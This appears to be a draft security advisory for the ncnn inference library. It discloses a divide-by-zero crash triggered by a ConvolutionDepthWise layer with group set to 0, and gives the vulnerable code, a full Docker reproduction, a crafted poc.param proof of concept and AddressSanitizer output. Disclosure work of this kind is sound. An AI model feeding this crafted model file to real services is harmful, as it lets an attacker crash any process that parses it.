All advisories
Draft

Divide-By-Zero DoS in Depthwise Layer Parsing

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Divide-By-Zero DoS in Depthwise Layer Parsing

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/convolutiondepthwise.cpp:46 in ConvolutionDepthWise::load_param
Sanitizer verdict: FPE on unknown address 0x62c9ed1d3b09 (pc 0x62c9ed1d3b09 bp 0x7ffdede1a050 sp 0x7ffdede19e80 T0)

Summary

A single attacker-controlled parameter, 7=0 on a ConvolutionDepthWise layer, terminates any ncnn process that parses the .param file with SIGFPE. The crash is in the validation code itself: the check meant to reject an invalid group count computes num_output % group before verifying that group is non-zero. No weights are needed — the PoC runs ncnnoptimize poc.param null out.param out.bin 0, and the fault occurs inside ncnn::Net::load_param, which every embedder calls.

Detail

ConvolutionDepthWise::load_param reads group from parameter id 7 with a default of 1, applying no range check to the parsed integer. A few lines later it performs the divisibility test intended to reject inconsistent group configurations. That test is itself the sink: the modulo operator on int operands is an integer division and traps on a zero right-hand operand exactly as / would.

// src/layer/convolutiondepthwise.cpp:34
    group = pd.get(7, 1);
    int8_scale_term = pd.get(8, 0);
    activation_type = pd.get(9, 0);
    activation_params = pd.get(10, Mat());

    dynamic_weight = pd.get(19, 0);

    if (dynamic_weight)
    {
        one_blob_only = false;
    }

    if (num_output % group != 0)
    {
        // reject invalid group
        return -100;
    }

The PoC layer line is ConvolutionDepthWise dw 1 1 data out 0=1 1=1 2=1 3=1 4=0 5=0 6=1 7=0, so num_output is 1 and group is 0, and line 46 evaluates 1 % 0. Because dynamic_weight is unset the preceding branch is skipped and control reaches the modulo directly.

This happens during parameter parsing, dispatched from Net::load_param at src/net.cpp:1524, which is why the repro can pass the literal string null as the model path: the process is already dead before any weight file is opened. The -100 return that the surrounding code was written to produce is never reached.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-divide-by-zero-dos-in-depthwise-layer-parsing && cd ncnn-poc-divide-by-zero-dos-in-depthwise-layer-parsing

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'PARAM'
7767517
1 1
ConvolutionDepthWise dw 0 1 out 0=1 7=0
PARAM

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==1==ERROR: AddressSanitizer: FPE on unknown address 0x61d104ff7b09 (pc 0x61d104ff7b09 bp 0x7ffc79023a50 sp 0x7ffc79023880 T0)
    #0 0x61d104ff7b09 in ncnn::ConvolutionDepthWise::load_param(ncnn::ParamDict const&) /ncnn/src/layer/convolutiondepthwise.cpp:46
    #1 0x61d10011cca1 in ncnn::Net::load_param(ncnn::DataReader const&) /ncnn/src/net.cpp:1524
    #2 0x61d10015129e in ncnn::Net::load_param(_IO_FILE*) /ncnn/src/net.cpp:2177
    #3 0x61d1001515d6 in ncnn::Net::load_param(char const*) /ncnn/src/net.cpp:2196
    #4 0x61d100064beb in main /ncnn/tools/ncnnoptimize.cpp:2788
    #5 0x7a985dc001c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #6 0x7a985dc0028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #7 0x61d0fffe4624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: FPE /ncnn/src/layer/convolutiondepthwise.cpp:46 in ncnn::ConvolutionDepthWise::load_param(ncnn::ParamDict const&)
==1==ABORTING

Credit

Zheng Yu @ DepthFirst